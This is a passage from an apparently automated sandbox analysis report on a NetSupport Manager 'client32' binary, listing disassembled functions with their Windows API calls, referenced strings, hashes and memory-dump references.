Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
String ID: Error deleting membm, e=%d
API String ID: 3195047866-709490903
Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65

Function 110537C0 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 360COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(00000000), ref: 11053A8A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11041F40: inet_ntoa.WSOCK32(?), ref: 11041F52

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11053836, 11053886, 110539D3, 11053A5A, 11053AB8, 11053B2B, 11053B6F, 11053BB6, 11053BF4
TCPIP, xrefs: 110538E1, 11053A18, 11053A33
NSTWControl32, xrefs: 11053BD7
ListenPort, xrefs: 11053A2E
Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x], xrefs: 11053ADA
NSMWControl32, xrefs: 11053B90
IsA(), xrefs: 1105383B, 1105388B, 110539D8, 11053A5F, 11053ABD, 11053B30, 11053B74, 11053BBB, 11053BF9
Announce Error from %s. Invalid crc - ignoring, xrefs: 1105384C
NSSWControl32, xrefs: 11053B4C
Port, xrefs: 11053A13
port, xrefs: 110538DC
%s:%u, xrefs: 11053948

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
API String ID: 3701541597-1781216912
Opcode ID: 4012d7bf7cd662acba1db7b145b2213c5f5b8098bdad5345146ff4be72192dc1
Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
Opcode Fuzzy Hash: 4012d7bf7cd662acba1db7b145b2213c5f5b8098bdad5345146ff4be72192dc1
Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61

Function 11031820 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,B24479DC,00000000,00000000,00000000), ref: 1103185A

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

EnumWindows.USER32(11030850,00000001), ref: 11031932
EnumWindows.USER32(11030850,00000000), ref: 1103198C
Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 1103199C
Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 110319D3

Part of subcall function 11028450: _memset.LIBCMT ref: 11028485
Part of subcall function 11028450: wsprintfA.USER32 ref: 110284BA
Part of subcall function 11028450: WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
Part of subcall function 11028450: GetExitCodeProcess.KERNEL32(?,?), ref: 11028513
Part of subcall function 11028450: CloseHandle.KERNEL32(?), ref: 11028545
Part of subcall function 11028450: CloseHandle.KERNEL32(?), ref: 1102854E

Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 110319EB
SendMessageA.USER32(?,00000010,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 11031AA7

Strings

*ExitMetroDelay, xrefs: 11031872
Client, xrefs: 11031877
No new explorer wnd, xrefs: 110319B3
close new explorer wnd x%x, xrefs: 11031A6F
"%sNSMExec.exe" %s, xrefs: 11031945
\Explorer.exe, xrefs: 1103189A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
API String ID: 3887438110-1852639040
Opcode ID: fd22c120b4c951fa0c408bab330ae9316656ec978de79f2cd01a9ed51e5872a0
Instruction ID: e4a431c807ee13d88d7f5229128d7dd46b9a7d2a7c1cad66ff6ecfc7424b804f
Opcode Fuzzy Hash: fd22c120b4c951fa0c408bab330ae9316656ec978de79f2cd01a9ed51e5872a0
Instruction Fuzzy Hash: 9D919D75E002299FDB14CF64CC80BEEF7F5AF89309F1441A9D9599B240EB31AE81CB91

Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000017DD), ref: 110CF18A
ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
GetWindowRect.USER32(00000000,?), ref: 110CF1DD
GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
GetClientRect.USER32(00000000,?), ref: 110CF3C3
CreateWindowExA.USER32 ref: 110CF400

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CF1C0, 110CF254, 110CF2E4, 110CF3A6
Static, xrefs: 110CF3F9
m_hWnd, xrefs: 110CF1C5, 110CF259, 110CF2E9, 110CF3AB
..\ctl32\nsmdlg.cpp, xrefs: 110CF2B0
m_eh, xrefs: 110CF2B5

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClientCreateItemLongObjectShowText
String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
API String ID: 4172769820-2231854162
Opcode ID: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
Opcode Fuzzy Hash: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92

Function 110B39F0 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,B24479DC,111F10F8,111E6C98,?), ref: 110B3A64
UnionRect.USER32(?,?,?), ref: 110B3B12
LeaveCriticalSection.KERNEL32(?), ref: 110B3CAD

Strings

View, xrefs: 110B3A2F
limitcolorbits, xrefs: 110B3A22, 110B3AB7
Client, xrefs: 110B3ABC, 110B3B6C, 110B3B89, 110B3BA6, 110B3BC3, 110B3BF6
ScrapeNotBusyDelay, xrefs: 110B3BA1
ScrapeSkipDelay, xrefs: 110B3B67
8, xrefs: 110B3C0A
d, xrefs: 110B3A4E
ScrapeBandwidth, xrefs: 110B3BBE
ScrapeBandwidthPeriod, xrefs: 110B3BF1
ScrapeBusyDelay, xrefs: 110B3B84

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
API String ID: 3518726166-774679399
Opcode ID: acdbe4835dbf9f086b7ba4344e4d624bd78def567480ca16e1e08394df29c600
Instruction ID: aebd380d628d0b1599e2b276af2785b4fa2c3b861337a9a0e451ff4e8484ea1a
Opcode Fuzzy Hash: acdbe4835dbf9f086b7ba4344e4d624bd78def567480ca16e1e08394df29c600
Instruction Fuzzy Hash: AE915A78E04259AFDB44CFA5D980BEDFBF1FB48304F20815AE909AB344D731A841CB98

Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000017D,B24479DC,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
_memset.LIBCMT ref: 1110F4C2
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE

Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?,?,00000000,110C1126,00000000,00000000,00000000,00000000,?,1105E793,00000001,00000001,?,00000000), ref: 11110008

CloseHandle.KERNEL32(?), ref: 1110F5F5
_free.LIBCMT ref: 1110F628
CloseHandle.KERNEL32(00000000), ref: 1110F665
timeEndPeriod.WINMM(00000001), ref: 1110F677
LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,B24479DC,0000017D,00000001), ref: 1110F681

Strings

PCIR, xrefs: 1110F5C9, 1110F5CC
End Record %s, xrefs: 1110F442

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
String ID: End Record %s$PCIR
API String ID: 4278564793-2672865668
Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91

Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110F711B
GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
wsprintfA.USER32 ref: 110F7235
SetLastError.KERNEL32(00000078), ref: 110F7242
wsprintfA.USER32 ref: 110F7267
GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
SetLastError.KERNEL32(00000078), ref: 110F72BC
FreeLibrary.KERNEL32(?), ref: 110F72D0

Strings

WTSFreeMemory, xrefs: 110F72A1
WTSQuerySessionInformationA, xrefs: 110F716F
%x:%x:%x:%x:%x:%x:%x:%x, xrefs: 110F722F
Wtsapi32.dll, xrefs: 110F7113
%u.%u.%u.%u, xrefs: 110F7261

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
API String ID: 856016564-3838485836
Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20

Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
GetDC.USER32(?), ref: 11025085
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
SelectObject.GDI32(?,00000000), ref: 110250A2
GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
SelectObject.GDI32(?,?), ref: 110250C7
ReleaseDC.USER32(?,?), ref: 110250CF
SetCaretPos.USER32(?,?), ref: 11025111

Strings

, xrefs: 1102502F

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
String ID:
API String ID: 4100900918-3916222277
Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60

Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101F0FE
SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D

Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C

Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88

DeleteObject.GDI32(00000000), ref: 1101F16C
DeleteObject.GDI32(00000000), ref: 1101F178
CreateFontIndirectA.GDI32(?), ref: 1101F187
CreateFontIndirectA.GDI32(?), ref: 1101F19F
GetMenuItemCount.USER32 ref: 1101F1A7
_memset.LIBCMT ref: 1101F1CF
GetMenuItemInfoA.USER32 ref: 1101F20C
__strdup.LIBCMT ref: 1101F221
SetMenuItemInfoA.USER32 ref: 1101F279

Strings

MakeOwnerDraw, xrefs: 1101F0E4
0, xrefs: 1101F1E8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
String ID: 0$MakeOwnerDraw
API String ID: 1249465458-1190305232
Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94

Function 1112B9B0 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1112B9E6
GetProcAddress.KERNEL32(00000000,WSAStartup,?), ref: 1112BA03
GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
FreeLibrary.KERNEL32(00000000), ref: 1112BAAC

Strings

ws2_32.dll, xrefs: 1112B9CB
socket, xrefs: 1112BA0F
WSAIoctl, xrefs: 1112BA2B
WSACleanup, xrefs: 1112BA05
closesocket, xrefs: 1112BA1D
WSAStartup, xrefs: 1112B9FD

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
API String ID: 2449869053-2279908372
Opcode ID: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
Instruction ID: 1bba0573f20789ca060975004b1edadb32616992e73bf794dbb13e42fcf3a639
Opcode Fuzzy Hash: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
Instruction Fuzzy Hash: 5231B371B11228ABEB249F758C55FEEF7B8EF8A315F104199FA09A7280DA705D408F94

Function 1102370A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON

Download Yara Rule

APIs

